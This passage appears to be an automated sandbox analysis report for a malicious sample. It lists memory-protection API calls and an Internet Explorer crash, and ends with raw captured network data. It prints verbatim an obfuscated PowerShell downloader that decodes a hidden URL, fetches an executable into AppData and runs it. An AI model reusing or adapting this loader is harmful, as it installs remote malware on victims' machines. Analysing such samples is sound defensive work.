protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003260000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000741f3000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 10424320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003070000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c26000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d76000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769c0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d4f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d5b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefda37000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefef64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefef61000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2612 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 106620048
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 106626000
registers.r11: 106621808
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1891414747
registers.r13: 0
1 0 0
file C:\Users\test22\AppData\Roaming\eee.exe
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
cmdline powershell.exe -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
file C:\Users\test22\AppData\Roaming\eee.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received Wex”P¾Y¹W]”e*ž –ΰBoDOWNGRD ] &³0aöÐjobsk» ¸PÿJz:&–[5s`ÑÀ ÿ 
Data received  
Data received  >0‚:0‚à a4FuÎáÌ á-&·Ö!0 *†HÎ=0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30 230126000000Z 240125235959Z0u1 0 UUS10U California10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0Y0*†HÎ=*†HÎ=BÕ…œºWj~0œä†¿ÓìhÃÎÿʀƒÙæñWdA¿xrªX¬ÞÒÕÆÍg¤¼qYü¡]­ÍªIÇ&dôì|£‚{0‚w0U#0€¥Î7êë°u”gˆ´EúÙ$‡–0UsôkØeµ‹:ø𢡊²åÆq»0BU;09‚one-clickr.icu‚sni.cloudflaressl.com‚*.one-clickr.icu0Uÿ€0U%0++0{Ut0r07 5 3†1http://crl3.digicert.com/CloudflareIncECCCA-3.crl07 5 3†1http://crl4.digicert.com/CloudflareIncECCCA-3.crl0>U 70503g 0)0'+http://www.digicert.com/CPS0v+j0h0$+0†http://ocsp.digicert.com0@+0†4http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0 Uÿ00‚} +Öy‚m‚igvîÍÐdÕÛÎÅ\·´Í¢2‡F|¼ìÞÃQHYFqµ›…íÚIÁG0E!ÓAÔ9©äIRÛDz÷«{f]R±Å,Oô釋 p4Š|Tò^¾÷žÉqTÌÅLº¡‹þ:R£½Ãõà usٞ‰L–x  }Gæ²ÆÐQ^q*Œk€zÁwrµ…íÚJ;F0D pÂ;:’?ÓTŸ—ýÎ01ëÇ£F;uÕ¼Ï>Ê~TvDç â>œA}`¡±´ƒ,Ÿ­¶‹¤0{é(n)™ Ux5ŠÒvH°ãkÚ¦G4åjú0ëRËVÝ,Ù»¿«9؄s…íÚIüG0E #:™©WånØô־â7 ëÂ@ò 瑋ˆº!^ÝÝßaqíùí’J%j]g˜l›ûÿ«¤G y¡G0 *†HÎ=H0E!¥4æü®eèa$,ў/gÄú L¿í„°ž}9cÀ /4M¹Ùu›8Ú´oÐ`,ö+Ö\+ pÁóQo(^{kÑ0‚Í0‚µ  7‡d^_´Œ"Nýí <0  *†H†÷  0Z1 0 UIE10U  Baltimore10U  CyberTrust1"0 UBaltimore CyberTrust Root0 200127124808Z 241231235959Z0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc ECC CA-30Y0*†HÎ=*†HÎ=B¹­Mf™ FìÑ*P/4}-–¸ˆ8›…_¿»MïaFÄÉsÔ$OàîÎl³Qq/jîL wÓrb¤›×£‚h0‚d0U¥Î7êë°u”gˆ´EúÙ$‡–0U#0€åY0‚GX̬úT6†{:µMð0Uÿ†0U%0++0Uÿ0ÿ04+(0&0$+0†http://ocsp.digicert.com0:U3010/ - +†)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `†H†ýl0*0(+https://www.digicert.com/CPS0  `†H†ýl0g 0g 0g 0  *†H†÷  ‚$Ý°*ë˜Ö…ã9M^kW‚Wüëè1¢We¾D8Zw¹ÏBÆᒤãE'øG,h¨V™ST­ž@ÁÐ¶× 8HlP,I[d‹ÌH0.Þâ›I"À’ ^–’”Õü ÜVl咓¿zÀ7ã…Iú+át9·Úó¢WX`O̎”üF{41>MG‚:Ëô‰]ïM nœ‚$Ý2%]xQ= 5#/eoœÁÑC×Ðó1gY'ÝkÒu “$$Ï)¾æ#ør?éÈ$DSz³¹ae¡LÆHÉuc‡pERƒÓ•Eêðè1~  þ>ݪ<^tÒ¬±
Data received “
Data received AÀ`?.½éOÌ·75\¢‘ƒˆT¶‘+ŽÎr ¥:ao܍>%ûۂ¨j…k&µ¬z=œ¼+ÿt8k4PO2²­!ÁH0F!ÐÕ NÈà'ÖÀ‰C¦-æ¶6ØíÏF¾r©ÖŠH˜Ls!ˆ•å€,×Úÿ[èMíˢüYgGL0;°ÊÝhßÑ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received 5£JcÛV–˜<5ßÈq<l ÏË´C_è Túƒ:0²õ®@yæaH« ­™“Yp
Data received p
Data received Ç¢AÆÉևó¾wšGÇï[‚¯Qi݆±iµ>QPÌ?œ,¥ê>ú¶‡­93æu䕨>“ß Ï҄ *#9É\ԉ%•¾ÜÊ`ô4îãŠ*«Ÿ«¿£œº«+ Ѧƒrœ ùJ÷}"ߧjî•Ó$ÞEz~AùTj.6kåbi;¬³ƒ–-ïýJß{ñsöòSáoGÏ8ƒ‰ (˜ëw>yßp½üÄá=µ©#¬9«K¦ãý€ž!²ÛT[5câ™|nÔ°£É~jàÎ%ÎèU'óì¿*ª%£Ï>”C“aêàÅ. ùOþ“{›˜Ì]ʑ„ D»gYÖÔ^’÷Ímï…ÿÄÐeïn#ÃÍ[£‘09"¸Ã45vÑ3òë+!JžVÜõÉ~qþ@ ދd®y'iß?&d¢î¤ù2'cÖ ­¹D°ç÷ADyÜ¡ó 1؏Ë`ó.‡?7óÔmÇ1ÔùPÏÁÕÆ8 :ó9=ë9ieŽ¸×ßƅ«Á³2¹?ÔÇÛ Ž°¥¤®=ü\‰d(ªµ`žÈ JW;_Té °N#jùE&’ò€`ØÛo –·Wyýª@Fzt”Ãàœ×q á“$QŽÿÆ.M¹Ÿ$ÃIŠv:°ÄùP –€š#ì˽{»=,¡ü¤ÿ}Wæ&Ý?_ Yà·ê¶­÷ Áä´÷ë eà}Vµ6T¦?¨GÅúg”Ç  1MV™½D~a¼^Qä ܵŒh‰VúÏ`cµEàcøkäè<žPÍ.é0ª²êDµüM±Ñ‰d$­¤ä#¨| $†sõøM`Þ—­dG]mÇM•º+>͉1Sê Xòeô(bܾžC–qøñcšókOÎâ󹙮∫安~5óæDq QÜøq”ôƒ¦b[ °ð¡¡òV£;Ã>o}D7G+ÕüÌÛåT³?®óYJàã{£Xå‰ä„Ù©ù¿Êq”¬þñ:f¸9¾\T)P?)v†þ'Ô;‰”›Þ6=q:±£é¤ôø×ÄÒ$ìMÉáŸäïÙ·z†ÜoñÂ?ô¹ìIÜÓÏÂbÓ3ÑÁ\ö߉uÌÍ% ÁbCô˜#QäK;B­PùubH™R-ƒþnÉZØÅÔ'­=' ë¢õh r¸aAQìPԐɡ}îNƑ¶X'É-Dª1(årʨ@û÷5Úa¹´# ¨)´0ßÂEÿÀÞwìƫٓ¶%ý}BÜ´¿ùuêê¬*’¢~'eþ„l¹Ú—Œz|ûÜùÓËR±êív> ¿-,ÎhŒ"jS6¬Ò±ñS™ÜzäÝs"SŸ.õ¢´œù‹s?µ†…¶Ÿ/"Òj‰ZüÄ#ÊÜoá=/¶y«™“?ã}y¥ÜžUJËKû2ì¬KŠöˆ017ÇêUÞɯúùW…·˜âÏSXN͛›¤À$qžß¸`à%¶Õ^8q» ’ ^ûAïÕÁgb.ѓ{fm-7~IÛýù”à²q˜{dWåW1ä¿uÌ dB76ö>Vk·¡ïóç؝ÇÑ¥ö1)éñÕ¤ÿ½à,ÕûòJ5™TpÏÃaqµ˜ÊLç5ËZ8ª0êO¾6ƑGͅë}6¡‡1\Ö^t¤À©RÜÖ¨áH\»·:„ ­S‚kMð¶¯u”,“#ÀÛÈÙzXOÂÀ%Þo:ސƒ#¯U ™gêæɄ㳋®Pb-RfL… u–Óâ-‰ÿ#nB 0Âh¸‘{ºÞ—äêèˆH”»=lIES{xa|ý.Ó¹wYçüÈ0s3¹WP>dx±Ë̟Z4™ “ßé?ªR ‡
